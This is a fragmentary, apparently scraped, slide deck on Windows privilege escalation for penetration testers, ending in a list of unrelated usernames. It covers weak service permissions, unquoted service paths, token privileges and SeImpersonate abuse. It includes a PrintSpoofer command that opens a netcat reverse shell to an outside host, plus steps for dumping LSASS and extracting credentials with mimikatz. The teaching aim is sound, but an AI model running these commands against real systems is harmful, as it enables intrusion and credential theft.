experience in Cybersecurity • Specializing in Application Security and Network Penetration Testing • Actively exploring and researching LLM Security and emerging AI threats Outside the Terminal • Boxing • Chess • Anime
process an attacker (or pentester) uses to gain higher privileges on a Windows system than the ones they currently hold — typically moving from a low- privileged user (standard user) to local Administrator or SYSTEM. It’s a core post-compromise step that enables persistence, credential access, and full control.
such as databases, configuration files, or stored secrets. • To enable further lateral movement within the client network by leveraging obtained credentials or escalated privileges.
can read, write, execute, or modify files and directories. • Permissive ACLs grant excessive access (e.g., Everyone: Full Control) to sensitive resources. Examples: • Services with binaries or directories writable by Authenticated Users • Startup items or scheduled tasks pointing to user-controlled paths • Application folders with world-writable permissions • Backup or log folders granting write/delete access to low-priv users
.\SharpUp.exe audit === Modifiable Service Binaries === Name : SecurityService DisplayName : PC Security Management Service Description : Responsible for managing PC security State : Stopped StartMode : Auto PathName : "C:\Program Files (x86)\PCProtect\SecurityService.exe"
Service Control Manager (SCM) and have associated security descriptors (permissions). • Weak service permissions allow unauthorized users to modify, reconfigure, or control services they shouldn't. Security Risk • Attackers can abuse weak permissions to: ⚬ Change the service binary path → point to a malicious executable. ⚬ Start/stop the service to execute code as SYSTEM. ⚬ Modify service configuration, leading to persistence or privilege escalation. • Exploiting services that run as NT AUTHORITY\SYSTEM can grant full control of the machine.
/accepteula -quvcw <service name> Step 3: Modify the service bin path to execute command. (Add user to localadmin group) Step 4: Stop and Start the service
ImagePath points to the binary to run. If that path contains spaces but is not enclosed in quotes, the Windows service loader may search for an executable in path segments — creating a local escalation/persistence vector if earlier path locations are writable by low-privilege users. Service Binary Path (example) Weak Permissions C:\Program Files\Acme App\Service\acme_service.exe Windows will try and load theexecuteable from the path as follows: • C:\Program • C:\Program Files • C:\Program Files\Acme • C:\Program Files\Acme App\Service\acme_service
C:\Program.exe (or an earlier writable path in the chain), that program could be executed by the service (which often runs as SYSTEM), resulting in privilege escalation. Step 1: Enumerating Services • wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ GVFS.Service GVFS.Service C:\Program Files\GVFS\GVFS.Service.exe Auto System Explorer Service SystemExplorerHelpService C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe Auto WindscribeService WindscribeService C:\Program Files (x86)\Windscribe\WindscribeService.exe Auto
drivers that allow attackers to execute code or corrupt kernel state, bypassing user-mode protections. Full system control — kernel-level access gives attackers complete control of the host. Bypasses protections — file ACLs, UAC and other user permissions become ineffective. Persistent compromise — enables rootkits or kernel implants that survive reboots and are hard to remove.
(universities, hospitals, utilities, government). Upgrading alone does not eliminate all risk — vulnerable apps, misconfigurations, and user behavior persist across versions. Microsoft stops issuing security updates for versions outside supported and extended support windows. Most EOL systems receive no public security patches. • Lack of vendor support: Applications (browsers, agents, tools) may stop working or receive no updates. • Hardware compatibility issues: New hardware may lack drivers or support on legacy OS builds. • Unpatched security flaws: No more security updates → exposure to remote code execution, privilege escalation, and historic “wormable” vulnerabilities.
OS-level capabilities assigned to accounts or groups that control sensitive actions (for example: creating tokens, debugging processes, loading drivers, or backing up files). They are separate from file/registry ACLs and group membership. These are enforced by the Local Security Authority (LSA) through the user’s access token. • SeAssignPrimaryToken • SeBackup Reference: https://github.com/gtworek/Priv2Admin
Windows are data structures that describe the security context of a process or thread: 1.Who you are (user SID) 2.What groups you belong to 3.What privileges you have (SeDebug, SeImpersonate, etc.) Every process in Windows runs with a token assigned when it's created. Tokens are key to authorization decisions by the OS.
and the system allows impersonation scenarios (e.g., services with named pipes), this is a golden path to SYSTEM. Key scenario: If your user has SeImpersonate Privilege, you can impersonate higher- privileged users if a service exposes a token. Many services allow named pipe connections where you can trick them into authenticating and capture an impersonation token. Technique: • Fake service → make SYSTEM connect → impersonate SYSTEM • Common in Juicy Potato, Rogue Potato, etc.
10 (build 1809 and later) and Windows Server 2019. • Check privileges: whoami /priv → Look for SeImpersonatePrivilege: Enabled • Run PrintSpoofer: PrintSpoofer.exe -c "c:\tools\nc.exe <ip> <port> - e cmd" • Result: SYSTEM shell
and control processes system-wide. • Bypasses normal ownership checks so a holder can operate on any process. High-privilege targets: Processes like lsass.exe contain secrets (passwords, tokens). Techninque: • Dump LSASS process using Procdump • Transfer the dump file to extracts cred by using mimikatz.
breachforce
matsu0228
kawaguti
bcantrill
oracle4engineer
moriyuya
sarahjwells
mappie_kochi
kokihirokawa
sanogemaru
maimyyym
nobu09
databricksjapan
bluesmoon
iamctodd
dougneiner
marktimemedia
keathley
malarkey
tammyeverts
vanstee
productmarketing
smashingmag
lynnandtonic
cassininazir
